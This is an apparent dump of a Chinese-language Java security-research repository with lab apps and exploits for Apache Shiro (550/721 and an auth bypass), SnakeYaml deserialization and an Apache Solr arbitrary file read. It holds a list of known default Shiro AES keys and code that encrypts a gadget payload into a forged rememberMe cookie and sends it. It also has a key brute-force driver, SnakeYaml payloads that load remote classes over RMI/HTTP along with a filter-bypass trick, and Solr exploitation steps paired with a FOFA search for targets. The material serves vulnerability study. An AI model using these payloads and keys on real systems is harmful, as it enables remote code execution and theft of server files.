| 9 | public class MainRealm extends AuthorizingRealm { 10 | // 用于授权 11 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 12 | // 获取当前授权的用户 13 | return null; 14 | } 15 | 16 | // 用于认证 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 18 | // getPrincipal 获取当前用户身份 19 | String username = (String)authenticationToken.getPrincipal(); 20 | // 获取当前用户信用凭证 (其实就是获取密码 密码是 char类型的所以要转一下 21 | String password = new String((char[])authenticationToken.getCredentials()); 22 | // 如果等于就返回对应的用户凭证 23 | if (username.equals("admin") && password.equals("admin")) { 24 | // shiro 会返回一个 AuthenticationInfo 25 | // 当前的realm名字 26 | return new SimpleAuthenticationInfo((Object)username, (Object)password, this.getName()); 27 | } 28 | throw new IncorrectCredentialsException("Username or password is incorrect."); 29 | } 30 | } 31 | 32 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/java/com/shiro/vuln/VulnApplication.java: -------------------------------------------------------------------------------- 1 | package com.shiro.vuln; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class VulnApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(VulnApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Controller/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Controller/UserController.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/MainRealm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/MainRealm.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/VulnApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/VulnApplication.class -------------------------------------------------------------------------------- /Shiro/shiro550/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.3/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.3/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.3/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/shiro550/cc11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/cc11 -------------------------------------------------------------------------------- /Shiro/shiro550/key.txt: -------------------------------------------------------------------------------- 1 | wGiHplamyXlVB11UXWol8g== 2 | 2AvVhdsgUs0FSA3SDFAdag== 3 | 4AvVhmFLUs0KTA3Kprsdag== 4 | 3AvVhmFLUs0KTA3Kprsdag== 5 | Z3VucwAAAAAAAAAAAAAAAA== 6 | U3ByaW5nQmxhZGUAAAAAAA== 7 | wGiHplamyXlVB11UXWol8g== 8 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 9 | kPH+bIxk5D2deZiIxcaaaA== 10 | 11 | -------------------------------------------------------------------------------- /Shiro/shiro550/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/payload -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/Shiro550Application.java: -------------------------------------------------------------------------------- 1 | package com.firebasky; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro550Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro550Application.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/AESencode.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.exp; 2 | 3 | import com.sun.crypto.provider.AESKeyGenerator; 4 | import com.sun.org.apache.xerces.internal.impl.dv.util.Base64; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | import java.io.*; 9 | 10 | 11 | public class AESencode { 12 | public static void main(String[] args) throws Exception { 13 | String path = "cc11"; 14 | byte[] key = Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="); 15 | AesCipherService aes = new AesCipherService(); 16 | ByteSource ciphertext = aes.encrypt(getBytes(path), key); 17 | System.out.printf(ciphertext.toString()); 18 | } 19 | 20 | 21 | public static byte[] getBytes(String path) throws Exception{ 22 | InputStream inputStream = new FileInputStream(path); 23 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 24 | int n = 0; 25 | while ((n=inputStream.read())!=-1){ 26 | byteArrayOutputStream.write(n); 27 | } 28 | byte[] bytes = byteArrayOutputStream.toByteArray(); 29 | return bytes; 30 | } 31 | } -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/Main.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.exp; 2 | 3 | /** 4 | * @author:Firebasky 5 | * 通过多线程方式 6 | * ref:http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/ 7 | */ 8 | public class Main { 9 | public static void main(String[] args) throws Exception{ 10 | try { 11 | System.out.println("正在暴力破解................"); 12 | ScanShiro thread = new ScanShiro(); 13 | thread.start(); 14 | Thread.sleep(20); 15 | thread.interrupt(); 16 | } catch (Exception e) { 17 | e.printStackTrace(); 18 | } 19 | } 20 | 21 | } 22 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | burp0_url = "http://127.0.0.1:8080/" 4 | burp0_cookies = {"JSESSIONID": "F9644B7DD50F08A6DEF9BD1B22B3999F", "rememberMe": "MgsckemDZpFVm8IxNR19ykC58oTyhbFbQYYuCGKoTW+//7y5HqUuZ52WaCyBzV2Rge7kJkN/ZvMqIIMI7CW04mzYPOJRnTANUWy7i+ijZeCMhdcLo30AwveuynGTuqdu39IDMZqgpSf63NpxcwZUMKd7ul6M4gPkoqaklZDJaMlEdwu/2l6hFtgEMfSq+/63"} 5 | burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} 6 | r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) 7 | print(r.headers) -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/test/java/com/firebasky/Shiro550ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.firebasky; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro550ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/Controller/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/Controller/UserController.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/Shiro550Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/Shiro550Application.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/AESencode.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/AESencode.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/CommonCollection11.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/CommonCollection11.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/Main.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/ScanShiro.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/ScanShiro.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/shiro/MainRealm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/shiro/MainRealm.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/shiro/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/shiro/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/test-classes/com/firebasky/Shiro550ApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/test-classes/com/firebasky/Shiro550ApplicationTests.class -------------------------------------------------------------------------------- /Shiro/shiro721/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.4/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/Shiro721Application.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro721Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro721Application.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/config/MyRealm.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.config; 2 | 3 | import org.apache.shiro.authc.AuthenticationToken; 4 | import org.apache.shiro.realm.AuthorizingRealm; 5 | import org.apache.shiro.subject.PrincipalCollection; 6 | 7 | public class MyRealm extends AuthorizingRealm 8 | { 9 | protected org.apache.shiro.authz.AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) 10 | { 11 | return null; 12 | } 13 | 14 | protected org.apache.shiro.authc.AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws org.apache.shiro.authc.AuthenticationException { 15 | String username = (String)token.getPrincipal(); 16 | if (!"admin".equals(username)) { 17 | throw new org.apache.shiro.authc.UnknownAccountException("账户不存在!"); 18 | } 19 | return new org.apache.shiro.authc.SimpleAuthenticationInfo(username, "123456", getName()); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/controllers/LoginController.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.controllers; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.subject.Subject; 6 | import org.springframework.web.bind.annotation.GetMapping; 7 | import org.springframework.web.bind.annotation.RestController; 8 | 9 | @RestController 10 | @org.springframework.web.bind.annotation.RequestMapping({"/"}) 11 | public class LoginController 12 | { 13 | @org.springframework.web.bind.annotation.PostMapping({"/doLogin"}) 14 | public void doLogin(String username, String password) 15 | { 16 | Subject subject = SecurityUtils.getSubject(); 17 | try { 18 | subject.login(new org.apache.shiro.authc.UsernamePasswordToken(username, password,true)); 19 | //shiro 20 | System.out.println("success"); 21 | } catch (AuthenticationException e) { 22 | e.printStackTrace(); 23 | System.out.println("fail!"); 24 | } 25 | } 26 | 27 | @GetMapping({"/admin/hello"}) 28 | public String hello() { return "hello"; } 29 | 30 | @GetMapping({"/login"}) 31 | public String login() { 32 | return "please login!"; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/controllers/index.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.controllers; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | @RequestMapping({"/"}) 8 | public class index 9 | { 10 | @RequestMapping({"/index"}) 11 | public String printName(String name) 12 | { 13 | return "Hello!" + name; 14 | } 15 | } -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/exp/url.ser: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/src/main/java/com/firebasky/shiro721/exp/url.ser -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8081 2 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/test/java/com/firebasky/shiro721/Shiro721ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro721ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8081 2 | -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/Shiro721Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/Shiro721Application.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/config/MyRealm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/config/MyRealm.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/config/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/config/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/LoginController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/LoginController.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/index.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/index.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/test-classes/com/firebasky/shiro721/Shiro721ApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/test-classes/com/firebasky/shiro721/Shiro721ApplicationTests.class -------------------------------------------------------------------------------- /SnakeYaml/SnakeYaml.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /SnakeYaml/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | SnakeYaml 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | 17 | 18 | org.yaml 19 | snakeyaml 20 | 1.17 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/CVE/gadget.java: -------------------------------------------------------------------------------- 1 | package CVE; 2 | 3 | public class gadget { 4 | public static void main(String[] args) { 5 | String poc = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://127.0.0.1:2333/exp', autoCommit: true}"; 6 | String poc1 = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 7 | 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/Person.java: -------------------------------------------------------------------------------- 1 | package learn; 2 | 3 | import java.sql.PreparedStatement; 4 | import java.time.Period; 5 | 6 | public class Person { 7 | public String name; 8 | 9 | public Person(){ 10 | } 11 | public Person(String name){ 12 | System.out.println(name); 13 | } 14 | 15 | public String getName() { 16 | System.out.println("get方法"); 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | System.out.println("set方法"); 22 | this.name = name; 23 | } 24 | 25 | public int getAge() { 26 | return age; 27 | } 28 | 29 | public void setAge(int age) { 30 | this.age = age; 31 | } 32 | 33 | public int age; 34 | } 35 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/test.java: -------------------------------------------------------------------------------- 1 | package learn; 2 | 3 | import org.yaml.snakeyaml.Yaml; 4 | 5 | public class test { 6 | /** 7 | * 特点在于它没有黑名单,不能设置私有属性,不能使用构造方法触发的 gadgets。 8 | * @param args 9 | */ 10 | public static void main(String[] args) { 11 | Yaml yaml = new Yaml(); 12 | //Person person = new Person(); 13 | //person.name="giao"; 14 | //person.age=18; 15 | //String dump = yaml.dump(person);//序列化 16 | //System.out.println(dump); 17 | 18 | //String poc1 = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 19 | // 20 | //String poc = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://127.0.0.1:2333/exp', autoCommit: true}"; 21 | String data = "!!learn.Person [\"18\"]";//调用构造方法 22 | System.out.println(yaml.load(data)); 23 | 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/学习.txt: -------------------------------------------------------------------------------- 1 | getClassForName:677, Constructor (org.yaml.snakeyaml.constructor) 2 | getClassForNode:664, Constructor (org.yaml.snakeyaml.constructor) 3 | getConstructor:336, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) 4 | construct:346, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) 5 | constructObject:182, BaseConstructor (org.yaml.snakeyaml.constructor) 6 | constructDocument:141, BaseConstructor (org.yaml.snakeyaml.constructor) 7 | getSingleData:127, BaseConstructor (org.yaml.snakeyaml.constructor) 8 | loadFromReader:450, Yaml (org.yaml.snakeyaml) 9 | load:369, Yaml (org.yaml.snakeyaml) 10 | main:22, test (learn) 11 | 12 | https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#%E7%9B%B8%E5%85%B3%E5%BA%94%E7%94%A8CVE -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/trick/SnakeYaml.java: -------------------------------------------------------------------------------- 1 | package trick; 2 | 3 | /** 4 | * https://b1ue.cn/archives/407.html 5 | */ 6 | 7 | import org.yaml.snakeyaml.Yaml; 8 | 9 | public class SnakeYaml { 10 | public static void main(String[] args) { 11 | String data = "!" + 12 | "!javax.script.ScriptEngineManager [!" + 13 | "!java.net.URLClassLoader [[!" + 14 | "!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 15 | //-------------------绕过----------- 16 | //String data = "%TAG ! tag:yaml.org,2002:\n" + 17 | // "---\n" + 18 | // "!javax.script.ScriptEngineManager [!java.net.URLClassLoader [[!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 19 | 20 | //String data = "! "+ 21 | // "[! [[!" + 22 | // " [\"http://127.0.0.1:2333\"]]]]"; 23 | 24 | Object parse = SnakeYaml.parse(data,Object.class); 25 | 26 | } 27 | 28 | public static Object parse(String data,Class clazz){ 29 | if(data.indexOf("!!")!=-1){ 30 | throw new RuntimeException("error"); 31 | } 32 | Yaml yaml = new Yaml(); 33 | return yaml.loadAs(data,clazz); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /SnakeYaml/target/classes/CVE/PoC.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/CVE/PoC.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/CVE/gadget.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/CVE/gadget.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/learn/Person.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/learn/Person.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/learn/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/learn/test.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/trick/SnakeYaml.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/trick/SnakeYaml.class -------------------------------------------------------------------------------- /Solr/Apache Solr 任意文件读取漏洞/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | Apache Solr <= 8.8.1 10 | 11 | ## 搜索 12 | 13 | ``` 14 | FOFA:Apache Solr <= 8.8.1 15 | ``` 16 | 17 | ## 漏洞复现 18 | 见exp 19 | 20 | ## exp 21 | 22 | + 我们的目的是通过信息泄露获得我们想要的路径 23 | + 然后通过路径去访问xxx/config,并且设置配置文件`{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}` 24 | + 最后通过`/solr/xxxx/debug/dump?param=ContentStreams`的post方法去读文件。 25 | -------------------------------------------------------------------------------- /Solr/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr漏洞 2 | **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** 3 | 4 | Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 5 | -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224825746.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224825746.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224902858.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224902858.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225556986.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225556986.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225716796.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225716796.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231451748.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231451748.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231819148.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231819148.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231847037.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231847037.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232049395.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232049395.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232204534.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232204534.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232632661.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232632661.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233138950.png: -------------------------------------------------------------------------------- 